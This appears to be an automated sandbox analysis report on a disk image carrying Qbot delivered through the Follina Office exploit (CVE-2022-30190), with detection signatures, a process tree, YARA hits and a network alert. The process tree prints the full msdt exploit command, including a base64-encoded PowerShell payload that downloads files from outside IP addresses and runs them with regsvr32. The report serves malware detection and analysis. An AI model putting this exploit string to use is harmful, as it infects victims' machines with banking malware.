Windows
Analysis Report
68101181_048154.img
Overview
General Information
Detection
CryptOne, Follina CVE-2022-30190, Qbot
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Qbot
Yara detected CryptOne packer
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains capabilities to detect virtual machines
Spawns drivers
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- cmd.exe (PID: 5248 cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img" MD5: F3BDBE3BB6F734E357235F4D5898582D)
  - conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - powershell.exe (PID: 6088 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
- udfs.sys (PID: 4 cmdline: MD5: 6A442723D4D05D9F15D24C9942CDA00D)
- WINWORD.EXE (PID: 2896 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o " MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  - MSOSYNC.EXE (PID: 3532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  - MSOSYNC.EXE (PID: 1476 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  - msdt.exe (PID: 6148 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
- explorer.exe (PID: 6656 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- csc.exe (PID: 7084 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
  - cvtres.exe (PID: 7100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 7116 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
  - cvtres.exe (PID: 5072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 6408 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
- regsvr32.exe (PID: 6356 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
- regsvr32.exe (PID: 6300 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
- csc.exe (PID: 6896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
  - cvtres.exe (PID: 6492 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | |
| | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard | |
| | JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security | |
| | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | |
No Sigma rule has matched
Timestamp: | 06/07/22-19:21:17.785538 |
Source IP: | 185.234.247.119 |
Destination IP: | 192.168.2.4 |
SID: | 2036726 |
Source Port: | 80 |
Destination Port: | 49762 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |